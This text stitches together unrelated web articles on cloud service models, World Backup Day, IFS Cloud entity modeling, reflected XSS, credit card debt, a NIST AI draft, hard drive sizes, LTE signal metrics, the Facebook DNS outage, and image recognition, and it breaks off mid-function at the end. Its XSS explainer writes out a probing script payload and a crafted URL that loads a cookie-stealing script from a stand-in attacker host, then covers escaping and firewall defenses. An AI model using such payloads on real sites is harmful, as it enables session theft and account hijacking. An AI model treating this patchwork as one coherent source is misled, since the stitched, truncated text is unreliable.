Cloud solutions are for the most part no longer seen as an option, but a necessity. The versatility of cloud services has seen them impact everyone from small independent companies to global enterprises. But cloud services aren’t a one-size-fits-all solution, and with so many options and terminology relating to them, finding a suitable solution or service can be confusing.
We thought it would be helpful to decipher three of the most commonly used cloud service terms: Software as a Service (SaaS), Platform as a Service (PaaS) and Infrastructure as a Service (IaaS). All can be very beneficial to business but despite sounding very similar, their functions differ greatly, and their relevance ultimately depends on the end users' requirements. So, let's break them down.
Definition: A method of software delivery in which software is accessed online via a subscription, rather than bought up-front and installed on individual devices.
Being the most commonly utilised of the three, you've likely heard of Software as a Service before and probably use SaaS-delivered applications on a regular basis. Essentially, SaaS means remotely accessing cloud-based application services on demand, which has made such applications widespread throughout commercial markets. As these applications are accessed through the internet, they often need no installation by the end user. Well-known examples of SaaS applications are Uber, Netflix, Salesforce, Dropbox and Microsoft Office 365.
For businesses, Software as a Service applications provide a cost-effective, flexible and simple solution in place of purchasing traditional software, which often came with a hefty up-front investment and installation period. Often multi-platform accessible (both web and mobile), SaaS can streamline business operations into one accessible resource, replacing many previously manual tasks, improving efficiencies and therefore saving time and money. With third parties hosting and maintaining the software, the model also removes laborious installation work and potentially costly technical support and maintenance. The SaaS model can also be scaled easily to meet the demands of the user and market.
Definition: A cloud-based environment for application and resource design and development.
Similar to how the SaaS model allows users to access ready-to-use software, PaaS allows users to access platforms for software creation. Like SaaS, generally a third party provider will deliver the tools needed for development over the internet. These components provide a framework which the user can then use to build and tailor specific applications. The PaaS provider is usually responsible for hosting servers, storage, network and all other infrastructure. This allows the end user the freedom to focus on the build. Common examples of PaaS providers include Oracle Cloud, WordPress.com and Google’s App Engine.
As PaaS allows users to consume resources they don't have to invest in or maintain, it can be extremely cost-effective. The PaaS provider's environment will also be fully tested and optimised and, in most cases, superior to anything the end user could construct themselves. As this model is delivered over the internet, the end user is not bound by location or time constraints, providing a quick and convenient solution. However, the biggest benefit of the PaaS model is the ability to provide a platform to quickly develop and customise applications to the end users' requirements.
Definition: A cloud computing service where virtualised computing resources are outsourced and accessed via the internet.
Made possible through virtualisation, the IaaS model allows users to purchase and expand hosting infrastructure without having to invest in the actual hardware. The infrastructure isn't owned by the user, but this also means they aren't responsible for its maintenance and upkeep. Some examples of infrastructure that might be accessed as a service are servers, storage arrays, operating systems or networks. Although the hardware itself is physical on the provider's end, the services it delivers at the user's end are virtual. Examples of IaaS include Microsoft's Azure cloud platform and Secura's VPC.
The fact that the service is completely virtual has huge appeal for businesses looking for an easily implemented, managed solution. The lack of responsibility for the managed services can be beneficial, as it removes not only the investment needed to purchase the equipment but also the cost of maintaining and housing it.
Although each model may seem similar on the surface, as explained they provide very different, specific functions; their only real similarity is that all are delivered as a service, with no tangible elements and no (or minimal) upfront investment.
Hopefully this post has helped break them down and clear any confusion you may have. As always, if you have any questions please don’t hesitate to get in touch.
Image credit: bakhtairzein/Shutterstock.com
Matthew is Secura's content specialist, producing gripping, emotionally complex, edge of your seat, cloud hosting articles and videos.
In today's business world, you'd be hard-pressed to find an organization that doesn't utilize the cloud to at least some extent. Let's take a dive into how businesses use the cloud to be more sustainable and efficient.
Understanding How Business Computing Has Changed
It wasn't so long ago that users needed the physical copy of a movie to watch it, but with the advent of streaming at an affordable monthly rate, people are finding that they are spending less money while still getting access to all the movies they love. The same can be said for television series, as you don't have to wait for the airing time to watch a specific episode.
This cloud-based model has been adopted by many companies that provide software to organizations. Rather than purchasing licenses, businesses choose to pay a monthly fee for each user to access the service through the cloud. Of course, when it's absolutely needed, an organization might still choose to purchase the software outright, but cloud computing is generally considered the standard.
Why Cloud Computing Is So Popular
Rather than selling consumers installation codes or discs, the cloud enables organizations like Adobe and Microsoft to deliver services to users based specifically on what they need. Here are just some of the many benefits:
- Reduced Piracy: The cloud is able to curb software piracy simply by making legitimate software more accessible. The solutions are better protected by the developer, as the user needs an account to access them. Plus, if users have easy access to these solutions, they will be less likely to seek alternative means of obtaining them through piracy.
- Reduced Business Requirements: On-site infrastructure also plays a role in how easily users can take advantage of software solutions. While businesses would need to deploy full-blown workstations in the past, cloud solutions enable workers to access services on any device they own, whether it's a slimmed-down workstation or their laptop.
- Reduced User Restrictions: Users are less restricted by resources when they use the cloud for certain services. For example, the sudden "genius" moment when you're not in front of a computer won't help if you have no way to record it. The cloud gives employees the opportunity to take advantage of solutions on mobile devices, making them much more accessible when needed most.
- Reduced Financial Toll: Purchasing a software license outright might require a large up-front payment, as well as ongoing service fees to maintain the supporting infrastructure. Software as a service through the cloud makes software more accessible and affordable to businesses.
Does your business want to take advantage of software in the cloud? ActiveCo can help. To learn more, reach out to us at 604-931-3633.
World Backup Day was born out of regret.
As the story goes, the idea germinated on Reddit, as many things do, when some poor soul lamented the loss of a hard drive, which, tragically, had not been backed up. If only they had been more prepared …
From that simple, yet visceral post emerged a global effort to prevent such regret. That is why we now set aside March 31, just before April Fools’ Day, to remind all who will listen to be prepared for data loss and theft. Don’t be fooled into not backing up your data!
As World Backup Day stretches into its second full decade in 2022, individuals and organizations alike would be wise to heed its call to action. In fact, World Backup Day is more important now than ever before.
Mo Data Mo Problems
The first World Backup Day was celebrated in 2011 — or 29 iPhone models, 20 Marvel movies, three U.S. Presidents, and one pandemic ago. Suffice it to say, our world looks a lot different, as does our data.
For starters, we have a lot more of it now. From 2011 to 2022, the total amount of data created worldwide increased by 92 zettabytes, according to Statista. (For reference, a zettabyte is a billion terabytes. Think about it this way: If every terabyte in a zettabyte were a kilometer, it would be equivalent to 1,300 round trips to the moon. Go ahead and multiply that by 92 and you’ll start getting a sense of the amount of data we’re talking about.)
As data increases, so does its value to us. Medical records, financial statements, confidential employee information, classified government documents, pictures of your pets, all of it living electronically somewhere. A pessimist might choose to frame this another way. The more data we have, the more data we have to lose. As the Notorious B.I.G. would say, “Mo Data Mo Problems.”
Today, the pain associated with losing data — because of human error, hardware failure, natural disaster, or theft — has become almost ubiquitous. Even my 85-year-old grandparents (generally) understand the importance of backing up their photos to the cloud. While losing family photographs can be frustrating, even saddening, the financial, legal, and reputational ramifications associated with data loss can be catastrophic for businesses, governments, and other large organizations.
And here’s the final rub: As the amount and value of data increases, so will attempts to steal and/or compromise it. Those who pay attention to recent headlines already know this to be true.
According to Cybersecurity Ventures, global cybercrime costs are expected to grow by 15 percent year over year. By 2025, the damages are predicted to reach $10.5 trillion annually, up from $3 trillion in 2015. That would represent the greatest transfer of economic wealth in human history — exponentially larger than costs associated with natural disasters and more profitable than the global sale of all major illegal drugs combined.
Yeah … yikes.
Back(up) to the Basics
The unfortunate truth of our time is it's likely not a matter of if data loss will occur — but when. Data can be accidentally deleted or become corrupted. Viruses, physical damage, or formatting errors can render it unreadable by both humans and software. Cyber attacks are growing not only in frequency but in sophistication, with criminals finding new and creative ways to reach our data.
It increasingly looks like data loss — at least for a time — is inevitable.
In light of this reality, we’re reminded just how important the message of World Backup Day actually is. The need for secure, reliable backup has never been more paramount, especially for critical industries like healthcare, manufacturing, financial services, government, education, and transportation. There’s simply no room for “If Only” scenarios that end in data loss and regret.
Backups can truly make a difference when protecting your critical data. To get started, organizations should ensure that they're abiding by the golden rule of data protection: the 3-2-1 rule of backup. This rule stipulates that you should keep three copies of your data (the original and two backups) on two different types of media (for example, local disk and cloud), with one copy stored off-site in case of a natural disaster or other data catastrophe.
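To make the rule concrete, here is a minimal Python sketch of 3-2-1-style copying with checksum verification. The paths are hypothetical, and a real deployment would rely on dedicated backup software rather than a hand-rolled script like this.

```python
import hashlib
import shutil
from pathlib import Path

def sha256(path: Path) -> str:
    """Hash a file so every copy can be verified against the original."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def backup_321(original: Path, second_medium: Path, offsite: Path) -> None:
    """Keep 3 copies (original + 2 backups) on 2 media, 1 of them off-site."""
    expected = sha256(original)
    for target_dir in (second_medium, offsite):
        target_dir.mkdir(parents=True, exist_ok=True)
        copy = Path(shutil.copy2(original, target_dir))
        if sha256(copy) != expected:
            raise IOError(f"Backup copy {copy} failed checksum verification")

# Hypothetical targets: a second local disk and a mounted off-site/cloud volume.
backup_321(Path("reports/q1.xlsx"), Path("/mnt/backup_disk"), Path("/mnt/offsite"))
```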
As data loss events become more unpredictable, the need for an air-gapped/hardened backup target has also become a must-have. Many ransomware varieties or malicious processes will now attempt to delete or encrypt backup data. Ensuring your organization’s backups are protected from such threats is vital.
The good news is that with a little extra initiative, there are reasons to believe that our data can be protected and retrievable when needed. Luckily, today’s backup and recovery solutions are simple to manage, affordable, flexible, and non-intrusive.
This World Backup Day, make sure you have the right backup and recovery solutions in place. Protect your data wherever it lives with iland and 11:11 Systems. You won’t regret it.
For more information: iland Secure Cloud Backup.
The Entity is used to model a business object in IFS Cloud. One business object is represented by one or more entities. Entities are used to encapsulate different properties and code that belongs to just one entity. Entities are represented by tables, views and packages in the code.
Note: In previous versions of IFS Applications a Logical Unit (LU) was used instead of an entity. The LU is still described in some IFS documentation. Please remember that an LU is exactly the same as an entity.
Entities can be layered, meaning that they can be extended.
When you create an entity you will need to consider which attributes should be included, what associations the entity has to other entities, and whether the entity should be a state machine. You should also consider whether the entity is a generalization and which code generation properties need to be set in order to adjust the generated code.
Simple entities are easy to model in Developer Studio, but modeling more complex entities, with many attributes and code generation properties, is harder. You need to think more about how to build the model and what it should represent. When you model an entity you also have many choices to make: should it have associations; should it have a state machine; should it be a generalization entity; which code generation properties are needed to change the behavior; and so on.
You can choose between modeling the entity in text or in a diagram. You can also use overview diagrams to better visualize relations between entities.
Follow these steps to model an entity:
- Create the entity model.
- Add the attributes to the model.
- If the entity has associations to other entities, add them to the model.
- If the entity should have a state machine, add states and transitions to the model.
- If you need to change the behavior of the code generation, add code generation properties.
The codegen properties can be added on the top level, on the attributes, on the search domains, on the associations and on the states of the model.
- If the entity is a generalization, add that in the model.
- Generate the code.
In most cases you need to run through the steps above several times before you feel that the entity represents what you aimed for.
After code generation, you will get the following:
- One table to store the data.
- One database view called the base view, used to present data to the client.
- One database package, used to create entity specific business rules.
- The storage file is used for overtaking objects, adding sequences, creation of extra indexes and creation of additional tables.
- The views file is used for overtaking, overriding views and for creation of additional views.
- The plsql file is used for overtaking, overriding methods and creation of own written methods.
This is an example of an entity with a reference and code generation properties on different attributes.
What is an XSS attack
What is a reflected XSS attack
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.
The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application’s functions and the activation of malicious scripts.
To distribute the malicious link, a perpetrator typically embeds it into an email or third party website (e.g., in a comment section or in social media). The link is embedded inside an anchor text that provokes the user to click on it, which initiates the XSS request to an exploited website, reflecting the attack back to the user.
Unlike a stored attack, where the perpetrator must locate a website that allows for permanent injection of malicious scripts, reflected attacks only require that the malicious script be embedded into a link. That being said, in order for the attack to be successful, the user needs to click on the infected link.
As such, there are a number of key differences between reflected and stored XSS attacks, including:
- Reflected attacks are more common.
- Reflected attacks do not have the same reach as stored XSS attacks.
- Reflected attacks can be avoided by vigilant users.
With a reflected XSS, the perpetrator plays a “numbers game” by sending the malicious link to as many users as possible, thereby improving his odds of successfully executing the attack.
Reflected XSS attack example
- While probing the forum site for vulnerabilities, the perpetrator submits a search query containing a script payload, e.g., http://forum.com?q=news<script type='text/javascript'>alert('XSS');</script>.
- The query produces an alert box saying: "XSS".
This tells the perpetrator that the website is vulnerable. Next, he creates his own URL, which reads http://forum.com?q=news<script%20src="http://hackersite.com/authstealer.js"> and embeds it as a link into a seemingly harmless email, which he sends to a group of forum users.
While the sending address and subject line may appear suspect to some, it does not mean that it won’t be clicked on.
In fact, even if only one in every 1,000 recipients of the email click on the link, that still amounts to several dozen infected forum users. They will be taken to the forum’s website, where the malicious script will be reflected back to their browser, enabling the perpetrator to steal their session cookies and hijack their forum accounts.
Reflected XSS attack prevention and mitigation
There are several effective methods for preventing and mitigating reflected XSS attacks.
First and foremost, from the user’s point-of-view, vigilance is the best way to avoid XSS scripting. Specifically, this means not clicking on suspicious links which may contain malicious code. Suspicious links include those found in:
- Emails from unknown senders
- A website’s comments section
- Social media feed of unknown users
Having said that, it is ultimately up to a website operator to prevent potential abuse to their users.
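To illustrate the operator-side fix, here is a minimal Python sketch that escapes user input before reflecting it back into the page, using the standard library's html.escape. The search-results function is hypothetical, and real applications would typically also rely on their template engine's auto-escaping.

```python
import html

def render_search_results(query: str) -> str:
    """Echo the user's query back into the page with HTML metacharacters escaped.

    Without escaping, a query such as <script src="http://evil.example/x.js">
    would be reflected into the page and executed by the victim's browser.
    """
    safe_query = html.escape(query, quote=True)  # '<' -> '&lt;', '"' -> '&quot;', etc.
    return f"<h1>Results for: {safe_query}</h1>"

print(render_search_results('<script>alert("XSS")</script>'))
# <h1>Results for: &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;</h1>
```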
Additionally, web application firewalls (WAFs) also play an important role in mitigating reflected XSS attacks. With signature based security rules, supported by other heuristics, a WAF can compensate for the lack of input sanitization, and simply block abnormal requests. This includes, but is not limited to, requests that attempt to execute a reflected cross site scripting attack.
It should be noted that, unlike in a stored attack, where the perpetrator’s malicious requests to a website are blocked, in a reflected XSS attack, it’s the user’s requests that are blocked. This is done to protect the user, as well as to prevent collateral damage to all other website visitors.
The Imperva cloud web application firewall also uses signature filtering to counter reflected XSS. Additionally, the WAF employs crowdsourcing technology, which automatically collects and aggregates attack data from across the entire Imperva network, for the benefit of all users.
The crowdsourcing component of Imperva cloud security service ensures a quick response to zero-day threats and protects the entire user community against new threats. It also enables the use of advanced security heuristics, including those that monitor IP reputation, to keep track of repeated offenders and botnet devices.
If you’re carrying debts — from student loans, credit cards, a car note or a mortgage — you could probably tell me roughly how much you owe and at what interest rates you owe it. Thanks to the CARD Act, those of us who carry credit card debt now see how long it will take to pay it off on our monthly statements. It’s likely, however, that most folks don’t realize that by spending money on non-essentials, rather than paying off debt, you’re paying a tax of sorts. Here’s why.
While you're in debt, purchases you make actually cost more than what you pay the merchant, and not just when you buy them with a credit card. The reason for this is because every time we buy something (and particularly when we buy things we don't need), we are forgoing the opportunity to pay off existing debt — given that, let's just assume that everything we buy is essentially costing us more than we think we're paying.
Let's say you're carrying a $1,000 credit card balance at a 20% APR, and your issuer sets your minimum monthly payment at 2% — which is $20. If you keep your monthly payment fixed at $20 a month until it's paid off, it will take you just over nine years and you'll have paid about $1,168 in interest. If you paid $21 a month instead, it would take you about eight years and cost you about $1,005 in interest. (This is assuming you continue to pay down the debt, and do not add to it.) Just that extra $1 every month will save you a year of debt payments and about $163 in interest.
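Those figures are easy to reproduce. Here is a small Python sketch of the month-by-month payoff, assuming interest compounds monthly, the payment never changes, and no new charges are added:

```python
def payoff(balance: float, apr: float, payment: float):
    """Simulate fixed monthly payments; return (months, total interest paid)."""
    monthly_rate = apr / 12
    if payment <= balance * monthly_rate:
        raise ValueError("Payment too small: the balance would never shrink")
    months, total_interest = 0, 0.0
    while balance > 0:
        interest = balance * monthly_rate
        total_interest += interest
        balance += interest - payment  # final month is a smaller, partial payment
        months += 1
    return months, round(total_interest, 2)

print(payoff(1000, 0.20, 20))  # ~109 months (just over 9 years), ~$1,168 interest
print(payoff(1000, 0.20, 21))  # ~96 months (about 8 years), ~$1,005 interest
```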
Each dollar that you don’t pay over that fixed minimum payment ends up costing you so much more in the end.
It's important to keep that in mind when buying things while carrying a balance. If an extra $1 a month can save about $163 in the scenario above, what would an extra $5 a month (aka your Starbucks trip this morning) save you? How about an extra $70 a month (aka those great jeans you wanted, but maybe didn't need)? Buying items you don't need while carrying debt costs you more in the long run.
It's disconcerting to consider your spending as a series of purchases earning interest charges from the moment you make them, as they do in our debt tax scenario. For people already carrying credit card debt, avoiding interest charges is one reason they often switch to using debit cards. But if you're not actively paring down your debts by making more than the minimum payments – even on low-interest-rate debts like student loans, which some borrowers extend out to 30 years – you're increasing the time you carry those balances and, because of compound interest, the balances themselves.
So what should you do?
1. Start Paying Off Debts Completely
Whether it’s paying off those debts with the highest interest rates – or just the smallest debts to give you the motivation to carry on – start paying down your balances. The longer you carry them, the more you owe.
2. Don’t Let Your Credit Card Charges Become Invisible Spending
Whether you switch to a debit card, begin using cash or simply sign up for text alerts to notify you of changes to your balances, make sure your spending is visible to you on a daily basis. If you wait until the statement arrives to know whether you can pay off the balance, it’s already too late.
3. Consolidate Credit Card Balances
If you qualify, consolidating your credit card balances on a low-interest rate credit card can reduce the amount your debt costs you by lowering the interest charges that accrue on your overall balance. You may want to consider a personal loan to consolidate debt as well – these loans tend to carry lower interest rates than credit cards and have a fixed monthly payment and term.
4. Avoid Paying Consolidation or Consulting Fees
Many consumers who find themselves mired in debt accrue more of it by paying fees to unscrupulous credit consolidators. Much of what they will do for a fee you can do yourself by just taking the time to make a plan, pick up the phone, be assertive and untangle your finances.
5. Understand the Credit Effects
It’s a common credit misconception that carrying debt is good for your credit scores. In fact, carrying credit card debt can raise an important credit scoring stat – your utilization ratio. This number is the percentage of debt you charge to your total credit limit. Take our $1,000 example from above. If you carry that balance on a credit card with a $2,000 limit, you have a utilization of 50%. To achieve the best credit score you can, it’s important to keep this ratio under 30%, and 10% is even better. If you want to see where your utilization currently stands, you can see how it’s affecting two of your credit scores for free using tools on Credit.com.
When it comes to debt, there really are no free lunches. Indeed, it is always harder to get out of than it is to get into. The best thing you can do is to change your own thinking when it comes to money. When you are in debt, even the price tag has a price tag.
The National Institute of Standards and Technology (NIST) has issued a draft guideline for developing artificial intelligence (AI) technical standards, the first major, formal step in writing the standards that will guide the procurement and implementation of AI and machine learning technologies within the federal government. And because many private organizations base their decisions on NIST documents, those standards could have repercussions that reach far beyond government purchasing.
Within the draft guideline are sections that deal with a wide variety of topics around AI, including how AI applications are developed, how AI is explained to stakeholders and the public, and how AI applications are used. Security plays a role in several aspects of the proposal, from how to build "trustworthy" AI applications to ensuring that AI's use takes both proper security and proper concern for privacy into account.
The NIST Guideline has been developed as part of the response to the American AI Initiative, established by executive order in February. Within five key areas of emphasis set out in the order, one called for NIST "to lead the development of appropriate technical standards for reliable, robust, trustworthy, secure, portable, and interoperable AI systems." Formal comments on the draft are being accepted through July 19.
Humanity has long been plagued with the question, does size matter? Some say bigger is always better. Others believe size should be influenced by how the product will be used. So, who’s right?
Unfortunately, there’s no universal answer. From supersized fast food to pickup trucks with six doors, marketers have trained consumers to focus mostly on size—even when it comes to hard drive sizes.
So what does this mean for your next tech purchase? What is a normal hard drive size and what should your laptop hard drive size be? There’s a wide hard disk storage capacity range and deciding what you need can be a challenge. But when you consider the right factors, you can easily determine what drive size you need for your devices.
The role of hard drive sizes
You probably know that a hard drive is where the device stores your precious photos, videos and document files. Since a hard drive is simply your computer's long-term storage, hard drive capacity has little to do with performance and everything to do with how much content your device can hold, at least until the disk is nearly full. Any operating system (OS), including Windows, requires a specific amount of available hard drive space to run properly.
A PC that runs on Windows needs 10 to 15% of a hard drive’s storage to function. For the sake of simplicity, we’ll use the example of a 100GB drive. In this case, you would need to allow at least 10 to 15GB for the OS. If you don’t have enough free space for the OS to access, you’ll experience a significant decline in your computer’s performance.
When you’re choosing hard drive sizes, look for a drive with a capacity well beyond what you need to store your data. Think about how much data you currently have and how much you anticipate adding over the life of your computer. Then add at least another 15% to ensure you’ll have plenty of storage capacity for your OS.
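As a back-of-the-envelope aid, here is a sketch of that sizing rule in Python. The 15% headroom figure is the rule of thumb from above, not an exact requirement, and the example numbers are made up.

```python
def minimum_drive_size_gb(current_data_gb: float, expected_growth_gb: float,
                          overhead: float = 0.15) -> float:
    """Data you have + data you expect to add, plus ~15% headroom
    for the operating system and free-space overhead."""
    return (current_data_gb + expected_growth_gb) * (1 + overhead)

# Hypothetical example: 300 GB of data today, 150 GB expected over the machine's life.
print(round(minimum_drive_size_gb(300, 150)))  # ~518 GB -> a 1 TB drive is a safe pick
```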
The importance of speed
Hard disk size is important, especially if you have a lot of information to store or plan to create a great deal of data in the near future. But speed is another important consideration.
Speed in Hard Disk Drives (HDD)
HDDs are powered by motors. Regardless of HDD size, the faster the motor spins, the more quickly information is read and written to the disk.
We measure the speed of HDD motors in revolutions per minute (RPM), a measure of rotational speed. Desktop drives usually top out at 15,000 RPM; laptop HDDs are slower, at around 5,400 to 7,200 RPM. As with all decisions on a new computer, the speed of the hard drive should ultimately depend on how you'll be using it. Of course, no one ever regrets investing in speed! So you'll probably want to buy the fastest motor available for your desktop or laptop's hard drive—especially if your computer will be used for gaming or storing multimedia files.
Speed in Solid State Drives (SSD)
Most drives in today's consumer electronics use solid-state technology: they are SSDs. They have no moving parts, not even a motor, which means no RPMs. SSD speed is measured by how quickly the drive can read or write digital data, specifically in megabytes per second (MB/s).
Just as RPMs are independent of drive size in an HDD, so too are MB/s and hard drive capacity in an SSD. You can purchase minimal space with maximum speed, large capacity with low performance or anything in between. Your choice will be all about how much space you need and how you plan to use the drive.
Computer hard disk size
We’ve already talked briefly about the storage capabilities of HDDs within desktops and laptops. But the device you plan to use with your hard drive is actually another important consideration. Before deciding on hard disk size—or any other aspect of your disk—think through how the device will be used.
Do you need a desktop just for casual use? Or are you a gamer that requires far more capability than creating documents and spreadsheets? Do you need a laptop just to work or study remotely? Maybe your business is of a sensitive nature that precludes uploading data to a cloud.
But for most purposes, what is a good hard disk size? It depends on whether you're getting a laptop or a desktop machine.
Desktop hard drive size
Desktops usually have larger hard drives, because they can physically fit a larger disk. They're also more likely to be shared with other people and so need enough storage capacity to fit data from several users at the same time. Standard hard drives for desktops run from 500GB (or smaller!) to several terabytes (TB) or larger. But given the accessibility of cloud storage, the everyday user doesn't usually need a large-capacity hard drive.
Laptop Hard Drive Size
Most laptops have less storage than desktops because they’re physically smaller. The space constraints limit the hard drive capacity. Those same space constraints increase the overall cost of the computer because smaller is much harder to engineer and manufacture.
Figuring out the right hard drive size can be a challenge, but if you take the time to consider how you want to use your device, you'll know how much storage you need.
If your last disk failed, you're going to need a new hard drive! But you'll still need your old data. Call DriveSavers to learn how we can help you recover lost data.
An On Field Measurement Example

An LTE downlink is divided into subcarriers. A 5 MHz bandwidth downlink contains 300 subcarriers, and one in every three of those subcarriers carries LTE reference signals. In other words, of the 300 subcarriers, 100 transmit periodic reference signals.
The LTE downlink graph comes from a Sprint site in the Kansas City area in late April, well before Sprint stopped blocking devices from live LTE sites. So, the sector depicted here exhibits no data traffic; it is transmitting only the periodic reference signals on 100 subcarriers, which you can clearly count in the graph.
Now, RSSI is the more traditional metric that has long been used to display signal strength for GSM, CDMA1X, etc., and it integrates all of the RF power within the channel passband.
In other words, for LTE, the RSSI measurement bandwidth covers all active subcarriers. As before: RSSI = wideband power = noise + serving cell power + interference power.
If we take the above RF sweep of a Sprint 5 MHz bandwidth downlink, RSSI measures the RF power effectively of what is highlighted in yellow:
RSRP is an LTE specific metric that averages the RF power in all of the reference signals in the pass-band. Remember those aforementioned and depicted 100 sub-carriers that contain reference signals?
To calculate RSRP, the power in each one of those sub-carriers is averaged.
As such, RSRP measurement bandwidth is the equivalent of only a single subcarrier. And using the graph once more, RSRP measures the RF power effectively of what is highlighted in red:
Since the logarithmic ratio of 100 subcarriers to one subcarrier is 20 dB (i.e., 10 × log10(100) = 20), RSSI tends to measure about 20 dB higher than RSRP.
RSRP measures about 20 dB lower than what we are accustomed to observing for a given signal level
Thus, that superficially weak -102 dBm RSRP signal level that we saw previously would actually be roughly -82 dBm if it were converted to RSSI.
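Under the article's simplifying assumptions (reference signals on 100 subcarriers, negligible traffic and noise), the conversion is just the subcarrier-count ratio expressed in dB. A small Python sketch:

```python
import math

def rsrp_to_approx_rssi(rsrp_dbm: float, active_subcarriers: int = 100) -> float:
    """Approximate RSSI from RSRP for a lightly loaded 5 MHz LTE carrier.

    RSRP averages power over one subcarrier; RSSI integrates power over all
    active subcarriers, so the offset is 10*log10(N) dB under these assumptions.
    """
    return rsrp_dbm + 10 * math.log10(active_subcarriers)

print(rsrp_to_approx_rssi(-102))  # -82.0 dBm, matching the example above
```

Note that this offset only holds for this particular bandwidth and load; as the takeaways below explain, RSSI moves with bandwidth and subcarrier activity while RSRP does not.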
To conclude, here are a few takeaways about RSSI and RSRP as signal strength measurement techniques for LTE:
- RSSI varies with LTE downlink bandwidth. For example, even if all other factors were equal, VZW 10 MHz LTE bandwidth RSSI would measure 3 dB greater than would Sprint 5 MHz LTE bandwidth RSSI. But that does not actually translate to stronger signal to the end user
- RSSI varies with LTE subcarrier activity — the greater the data transfer activity, the higher the RSSI. But, again, that does not actually translate to stronger signal to the end user
- RSRP does a better job of measuring signal power from a specific sector while potentially excluding noise and interference from other sectors
- RSRP levels for usable signal typically range from about -75 dBm close in to an LTE cell site to -120 dBm at the edge of LTE coverage
* Sources: 3GPP, author's graphs
Last week's massive outage on the Facebook-Instagram-WhatsApp ecosystem left many of us puzzled and concerned: How did our entire social communication (and news source for many) become so dependent on a single, non-regulated conglomerate? How come this conglomerate can fail over a seemingly-trivial reason such as DNS? And what are the dangers of our over-reliance on such interconnected entities as our connection to the world?
What caused the Facebook outage?
“The Facebook case was actually more than just a DNS Failure: The root cause seems to be BGP (Border Gateway Protocol) failures underlying the DNS Protocol, which then caused the DNS to start failing,” says Francesco Altomare, GlobalDots’ chief EU-based expert for web performance solutions and business continuity strategies.
“But in essence, the DNS failed because something wasn't maintained as it should have been, to the point that it required manual intervention and resulted in an hours-long denial of service. A global corporation which controls most of the world's means of social communication has a responsibility to minimize that risk.

“DNS was the cause of most major global outages recently, including the latest Facebook and Slack ones. It happens because DNS is the most overlooked protocol on the web. And it can happen to any online business – not just the biggest global ones – and create monetary & reputation damages beyond repair.
“I keep seeing commentaries saying “it’s always DNS” as if nothing can be done about it, and this simply isn’t true. A modest investment in a resilient, performant, 100%-uptime, SLA-backed DNS Technology can save all this, and we’ve been doing this for decades.”
Asked about the probability of such future events in global interconnected services, Francesco explains:
“The reliance on interconnected systems does carry with it an inherent risk of system or even service failure. To counter this daunting risk, companies utilize tools such as SRE (Site Reliability Engineering), as well as DR (Disaster Recovery) and BCP (Business Continuity Planning), all of which deal with varying levels of redundancy built into each and every layer of your systems infrastructure. In fact, the so-called “Compound SLAs” are used to calculate that risk when a system depends on more than one component, each of which carries a distinct availability SLA (Service-level Agreement). The same goes for the notion of “Error Budgets”, where you, as an organization, live and cope with a budget for your systems' downtime and maintenance windows. If an entity can afford enough system downtime, a solution can always be found to assess and deploy technology that minimizes the risk and, applied repeatedly, potentially eliminates it.
“Yet despite these defensive, preventative, and protective tools, as well as the mounting literature on the subject, there remains no magic formula to determine a user's SLAs without active consultancy with its key stakeholders. Moreover, even a system backed by a 100% availability SLA is subject to failures, and when more than one component actively contributes to the availability percentage, calculating the risk of failure becomes an even more complex and grueling task. Simply stated, it is not a question of how likely systems are to fail, or of whether over-reliance on them leads to more problems. Rather, the question is how long these systems will last without constant maintenance and updates, and what can be done to delay the inevitable failure while maximizing utilization and output. Beyond that, the question turns to the human role in updating system code and configuration versus the machine-learning-driven coding of the future, and whether this will lower the risk and extend the timeframe of efficient system operation.
“DNS is probably the most overlooked web protocol, which is why even the world’s giants aren’t immune, unless they implement a multi-DNS strategy. This could happen to any website, and multi-DNS solutions are highly affordable, so no one should really go without them nowadays.“
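As a side note for readers unfamiliar with the compound-SLA arithmetic mentioned above: when a service depends on several components in series, their availabilities multiply, so the composite figure is always lower than the weakest component's. A quick Python sketch with made-up component figures:

```python
import math

def compound_availability(availabilities):
    """Availability of a chain of components that must ALL be up (serial dependency)."""
    return math.prod(availabilities)

# Hypothetical stack: network/BGP 99.95%, DNS 99.99%, application tier 99.9%.
composite = compound_availability([0.9995, 0.9999, 0.999])
print(f"{composite:.4%}")  # ~99.8401%
print(f"{(1 - composite) * 365 * 24:.1f} hours of downtime per year")  # ~14.0
```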
Steven Puddephatt, GlobalDots’ chief UK solution architect, adds:
“The probability of these systems failing is 100%. We know this because no service provider will offer more than '7 nines' uptime in their SLA. Undoubtedly Facebook have redundancy built into their core platform, but in this case it was a configuration change that caused the outage. As long as humans are involved with updating code & configurations there'll always be outages. I don't believe an over-reliance on them will increase outages; there were far more system outages (overall) when systems were less consolidated, you just didn't hear about them as they were less public-facing.”
Watch Steven’s whiteboard explainer below
GlobalDots is happy to be leading the Multi-DNS front, keeping business customers out of outages for nearly 20 years.
Exciting uses of image recognition that are already changing our lives
Image recognition has been a topic on our blog a few times before. It's a technology that hasn't stopped gaining popularity for some time now, and we wanted to look at the interesting and even unconventional ways image recognition software is making a difference in different industries today.
Image recognition applications in healthcare
Do you know the feeling of waking up in the middle of the night, opening your eyes, and seeing the same blanket of darkness as when your eyes were closed? For some people, that constitutes their whole lives.
Apart from the more apparent restrictions being blind or visually impaired brings, these groups of people are also cut off from one of the most essential tools of our decade: social media.
Some years ago, Facebook changed the way blind and visually impaired people use and interact with Facebook, all thanks to image recognition. It might sound trivial and straightforward at first, but for someone who lives in near or complete darkness, scrolling through Facebook to check up on friends' activities can take hours instead of minutes.
Facebook combined its face recognition, image classification and automatic alternative text technologies to generate an accurate description of the elements a photo contains, and also to identify who exactly is in the photo, even if they're not tagged.
The feature was developed by an accessibility team that included Facebook's first blind engineer, Matt King, who has been legally blind since his early 20s.
This feature is based on the same technology that suggests what friends you should tag in your photos. It is a machine learning system that analyzes the pixels of the face in the image, creating a so-called “template” to use for future reference in identifying people.
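Conceptually, such a "template" is a numeric vector (an embedding) extracted from the face, and recognition reduces to comparing vectors. The toy Python sketch below shows the matching step only; the dimensions, numbers and threshold are made up, and Facebook's actual models are far larger and proprietary.

```python
import math

def cosine_similarity(a, b):
    """Compare two face 'templates' (embedding vectors): 1.0 = identical direction."""
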